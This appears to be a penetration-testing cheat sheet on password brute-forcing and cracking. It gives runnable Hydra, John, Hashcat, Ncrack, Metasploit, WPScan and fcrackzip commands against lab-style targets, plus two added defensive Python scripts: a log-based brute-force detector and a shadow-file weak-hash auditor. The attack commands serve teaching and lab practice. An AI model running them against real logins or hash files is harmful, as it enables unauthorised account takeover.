# Brute Force Password Attacks & Cracking

## John The Ripper <a href="#john-the-ripper" id="john-the-ripper"></a>

```
john --wordlist=/usr/share/wordlists/rockyou.txt --format=$format hash.txt
```

## Hydra <a href="#hydra" id="hydra"></a>

To brute force a web login form with Hydra you need the following:

* IP address (or hostname) of the target
* Request type: http-get-form or http-post-form, followed by the form spec `path:form parameters:failure string`; Hydra substitutes `^USER^` and `^PASS^` on each attempt
* Username: -l for a single username or -L for a list of usernames
* Password: -p for a single password or -P for a password list
* Number of parallel tasks (optional): -t

```
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -f -t 2 10.10.10.75 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:login_error"

hydra -l admin -P /usr/share/wordlists/rockyou.txt -vV -f -t 2 10.10.10.75 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:login_error"

hydra $ip -l $username -P [password list] [http form type] "[path]:[form parameters]:[failure string]"
hydra -L <username list> -P <password list> [host] http-post-form "::"
hydra -L <wordlist> -P <password list> [host] http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"
hydra -l [username] -P /usr/share/wordlists/rockyou.txt [host] http-post-form "/wp-admin/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:S=http%3A%2F%2F[host]%2Fwp-admin%2F" -V
hydra -l root -P /usr/share/wordlists/fasttrack.txt [host] ssh
hydra -s 22022 -l root -P /usr/share/wordlists/fasttrack.txt [host] ssh
hydra -s 22022 -L userlist.txt -P /usr/share/wordlists/fasttrack.txt [host] ssh -t 4 -v
hydra $TARGET http-post-form -L /usr/share/wordlists/list "/endpoint/login:usernameField=^USER^&passwordField=^PASS^:unsuccessfulMessage" -s PORT -P /usr/share/wordlists/list
```

## Hashcat <a href="#hashcat" id="hashcat"></a>

```
hashcat -m $hashtype -a $attackmode -o cracked.txt target_hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 0 -a 0 -o cracked.txt target_hashes.txt /usr/share/wordlists/rockyou.txt --force
```

* `-m` is the hash type (e.g. `-m 13100` is Kerberos 5)
* `-a 0` is a dictionary attack
* `-o cracked.txt` is the output file for cracked passwords
* `target_hashes.txt` is the file containing the hashes to crack
* `/usr/share/wordlists/rockyou.txt` is the absolute path to the wordlist
* `--force` is something I always have to add (I think it's GPU-related)

## Ncrack <a href="#ncrack" id="ncrack"></a>

Ncrack can be used to crack RDP passwords:

```
ncrack -vv --user username -P password-file.txt rdp://[host]
```

## Metasploit <a href="#metasploit" id="metasploit"></a>

The `mysql_login` scanner module brute forces MySQL logins:

```
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set rhosts [target]
msf auxiliary(mysql_login) > set rport [port]
msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txt
msf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txt
msf auxiliary(mysql_login) > run
```

For Tomcat manager logins, Metasploit uses its list of default Tomcat usernames and passwords by default, but you can set a single username with `set username` or supply a custom list with `set user_file`. You can also run a longer password list with `set pass_file`. Depending on how fast the server responds you can use a big wordlist; otherwise stick to `fasttrack.txt`.

```
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set rhosts [target]
msf auxiliary(tomcat_mgr_login) > set rport [port, usually 8080]
msf auxiliary(tomcat_mgr_login) > set ssl true
msf auxiliary(tomcat_mgr_login) > set stop_on_success true
msf auxiliary(tomcat_mgr_login) > run
```

### Cracking WordPress Passwords with WPScan

```
wpscan --url http://blog.thm -P /usr/share/wordlists/rockyou.txt -U username.txt -t 75
```
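As a defender-side complement to the online guessing tools above (Hydra's http-post-form and ssh modules, Ncrack, the Metasploit login scanners and WPScan), here is an added example, not code from the original page, that looks for their footprint in logs: a burst of failures from one source, a slow spray across many usernames, and a success that follows a burst. The log lines are constructed; the source addresses (192.0.2.x, 198.51.100.x), the usernames and `ASSUMED_YEAR` are assumptions, and the login paths are the ones in the Hydra commands above.

```python
"""Spot the footprint of online password guessing (Hydra, Ncrack, Metasploit
login scanners, WPScan) in sshd and web-server logs.
Added example, not code from the original page. Log lines are constructed;
sources (192.0.2.x, 198.51.100.x) and users are placeholders; the login paths
are the ones from the page's own Hydra commands."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple, Optional

ASSUMED_YEAR = 2024  # syslog timestamps carry no year; assumed for the samples


class Event(NamedTuple):
    ts: datetime
    ip: str
    service: str
    user: Optional[str]  # unknown for web forms: access logs omit the POST body
    success: bool


# sshd in /var/log/auth.log: "Failed password for [invalid user] NAME from IP"
SSH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)"
)
# Apache/nginx combined log, POST requests only
WEB_RE = re.compile(
    r'^(?P<ip>[\d.]+) \S+ \S+ \[(?P<ts>[^\]]+)\] "POST (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
LOGIN_PATHS = {"/nibbleblog/admin.php", "/dvwa/login.php", "/wp-admin/wp-login.php"}


def parse_line(line: str) -> Optional[Event]:
    """Turn one log line into a login Event, or None if it is not a login attempt."""
    m = SSH_RE.match(line)
    if m:
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=ASSUMED_YEAR)
        return Event(ts, m["ip"], "ssh", m["user"], m["result"] == "Accepted")
    m = WEB_RE.match(line)
    if m and m["path"] in LOGIN_PATHS:
        # A 200 on a login POST means the form was re-rendered with an error (the
        # "login_error" string Hydra matches on); a 302 is the usual success path.
        ts = datetime.strptime(m["ts"].split()[0], "%d/%b/%Y:%H:%M:%S")
        return Event(ts, m["ip"], "http-form", None, m["status"] == "302")
    return None


def detect_bruteforce(lines: List[str], threshold: int = 10,
                      window_seconds: int = 60, spray_users: int = 5) -> Dict[str, dict]:
    """Flag a source that produces `threshold` failures inside any `window_seconds`
    window (Hydra-style burst) or tries `spray_users` distinct usernames (slow
    spray), and record whether a success from that source followed."""
    by_ip: Dict[str, List[Event]] = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev:
            by_ip[ev.ip].append(ev)
    window = timedelta(seconds=window_seconds)
    findings: Dict[str, dict] = {}
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e.ts)
        failures = [e for e in events if not e.success]
        if not failures:
            continue
        burst_max, start = 0, 0
        for end in range(len(failures)):  # sliding window over failures
            while failures[end].ts - failures[start].ts > window:
                start += 1
            burst_max = max(burst_max, end - start + 1)
        users = {e.user for e in failures if e.user}
        if burst_max >= threshold or len(users) >= spray_users:
            findings[ip] = {
                "failures": len(failures),
                "max_in_window": burst_max,
                "distinct_users": sorted(users),
                "services": sorted({e.service for e in failures}),
                # a success from the same source after its first failure is the
                # line worth paging on: the guessing may have worked
                "success_after_failures": any(
                    e.success and e.ts >= failures[0].ts for e in events),
            }
    return findings


def sample_log() -> List[str]:
    """Constructed lines, not real traffic: an SSH burst ending in a success, a
    web-form burst, a slow spray over six users, and one benign failed login."""
    lines = [f"Jan 10 12:00:{i:02d} host sshd[1000]: Failed password for root "
             f"from 192.0.2.10 port 4{i:04d} ssh2" for i in range(12)]
    lines.append("Jan 10 12:00:13 host sshd[1000]: Accepted password for root from 192.0.2.10 port 40013 ssh2")
    lines += [f'192.0.2.20 - - [10/Jan/2024:12:05:{i:02d} +0000] '
              f'"POST /nibbleblog/admin.php HTTP/1.1" 200 1510' for i in range(12)]
    lines += [f"Jan 10 12:{10 + i:02d}:00 host sshd[1000]: Failed password for invalid user {u} "
              f"from 192.0.2.30 port 50000 ssh2"
              for i, u in enumerate(["admin", "alice", "bob", "carol", "dave", "eve"])]
    lines.append("Jan 10 12:30:00 host sshd[1000]: Failed password for alice from 198.51.100.7 port 51000 ssh2")
    return lines


if __name__ == "__main__":
    for ip, finding in detect_bruteforce(sample_log()).items():
        print(ip, finding)
```

The thresholds are deliberately loose defaults: a `-t 2` Hydra run against a web form still lands a dozen POSTs inside a minute, while the spray check catches the slower `-L userlist.txt` style that never trips a per-minute counter. Feed it real `auth.log` and access-log lines (or adapt the two regexes to your log format) and alert first on the sources where `success_after_failures` is true.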

### Crack Zip Files

Reference: https://www.geeksforgeeks.org/recover-password-password-protected-zip-file/

```
fcrackzip -v -D -u -p /usr/share/dict/words secret.zip
```

`-D` selects dictionary mode, `-p` names the wordlist when used with `-D`, and `-u` tries to unzip with each candidate so false positives are weeded out.

### Find SSH Passphrase with John - Crack SSH Private Key

First convert the private key into a hash John understands with ssh2john, then run John against that hash:

```
python ssh2john.py SecretKey > SecretKey.hash
# then give the hash to john
sudo john SecretKey.hash --wordlist=[wordlist]
```

### Crack shadow or passwd File

```
# merge the account fields from passwd with the hashes from shadow
unshadow passwd.txt shadow.txt > passwords.txt
john --wordlist=/usr/share/wordlists/sqlmap.txt passwords.txt
# print the passwords john has already cracked
john --show passwords.txt
```
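Seen from the other side of the `unshadow` + `john` workflow, the question is which local accounts would fall first. The following is an added example, not from the original page: it audits shadow(5) entries for empty password fields, legacy DES and md5crypt hashes, and sha256crypt/sha512crypt entries whose `rounds=` has been lowered. The entries in `SAMPLE_SHADOW` are constructed with placeholder hash bodies; the hashcat `-m` numbers in the notes are the real modes for those schemes.

```python
"""Audit /etc/shadow entries for what makes them cheap to crack with the
unshadow + john workflow above. Added example, not from the original page; the
entries are constructed and the hash bodies are placeholders, not real digests."""
import re
from typing import List, NamedTuple, Optional

DEFAULT_ROUNDS = 5000  # glibc default for sha256crypt/sha512crypt without rounds=
ROUNDS_RE = re.compile(r"^rounds=(\d+)$")


class Finding(NamedTuple):
    user: str
    scheme: str
    severity: str  # "critical" | "weak" | "ok"
    note: str


# crypt(3) id prefix -> (scheme, severity against an offline cracker, note)
SCHEMES = {
    "1": ("md5crypt", "weak", "fast on GPU (hashcat -m 500)"),
    "5": ("sha256crypt", "ok", "hashcat -m 7400; keep rounds high"),
    "6": ("sha512crypt", "ok", "hashcat -m 1800; keep rounds high"),
    "y": ("yescrypt", "ok", "memory-hard, current glibc default"),
    "2a": ("bcrypt", "ok", "tunable work factor (hashcat -m 3200)"),
    "2b": ("bcrypt", "ok", "tunable work factor (hashcat -m 3200)"),
    "2y": ("bcrypt", "ok", "tunable work factor (hashcat -m 3200)"),
}


def audit_entry(line: str) -> Optional[Finding]:
    """Classify one shadow(5) line; None for comments or malformed lines."""
    if line.startswith("#"):
        return None
    fields = line.rstrip("\n").split(":")
    if len(fields) < 2:
        return None
    user, pw = fields[0], fields[1]
    if pw == "":
        return Finding(user, "none", "critical", "empty password field: no password needed")
    if pw.startswith(("!", "*")):
        return Finding(user, "locked", "ok", "password login disabled")
    if not pw.startswith("$"):
        if len(pw) == 13:
            return Finding(user, "descrypt", "weak",
                           "legacy DES: only the first 8 characters count (hashcat -m 1500)")
        return Finding(user, "unknown", "weak", "unrecognised hash format")
    # "$6$rounds=N$salt$hash" -> ["", "6", "rounds=N", "salt", "hash"]
    parts = pw.split("$")
    scheme, severity, note = SCHEMES.get(parts[1], ("unknown", "weak", "unrecognised crypt id"))
    if parts[1] in ("5", "6") and len(parts) > 2:
        m = ROUNDS_RE.match(parts[2])
        rounds = int(m.group(1)) if m else DEFAULT_ROUNDS
        if rounds < DEFAULT_ROUNDS:
            severity = "weak"
            note = f"rounds={rounds} is below the glibc default of {DEFAULT_ROUNDS}"
    return Finding(user, scheme, severity, note)


def audit_shadow(lines: List[str]) -> List[Finding]:
    """Audit every entry, worst first."""
    order = {"critical": 0, "weak": 1, "ok": 2}
    found = [f for f in map(audit_entry, lines) if f is not None]
    return sorted(found, key=lambda f: (order[f.severity], f.user))


def weak_accounts(lines: List[str]) -> List[str]:
    """Usernames whose hash an offline cracker would get through fastest."""
    return [f.user for f in audit_shadow(lines) if f.severity != "ok"]


SAMPLE_SHADOW = [  # constructed entries; hash bodies are placeholders
    "root:$y$j9T$SALTSALTSALT$PLACEHOLDERHASH:19700:0:99999:7:::",
    "svc_backup:$1$abcdefgh$PLACEHOLDERHASH:19700:0:99999:7:::",
    "legacy:AbCdEfGhIjKlM:19700:0:99999:7:::",
    "deploy:$6$rounds=1000$saltsalt$PLACEHOLDERHASH:19700:0:99999:7:::",
    "app:$6$saltsalt$PLACEHOLDERHASH:19700:0:99999:7:::",
    "guest::19700:0:99999:7:::",
    "sshd:*:19700:0:99999:7:::",
    "bob:!$6$saltsalt$PLACEHOLDERHASH:19700:0:99999:7:::",
]

if __name__ == "__main__":
    for f in audit_shadow(SAMPLE_SHADOW):
        print(f"{f.severity:8} {f.user:12} {f.scheme:12} {f.note}")
```

Run it as root against a copy of the real file (`audit_shadow(open("/etc/shadow").readlines())`); anything it reports as `critical` or `weak` is an account that the `unshadow` + `john` run above would reach long before the yescrypt and sha512crypt entries.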

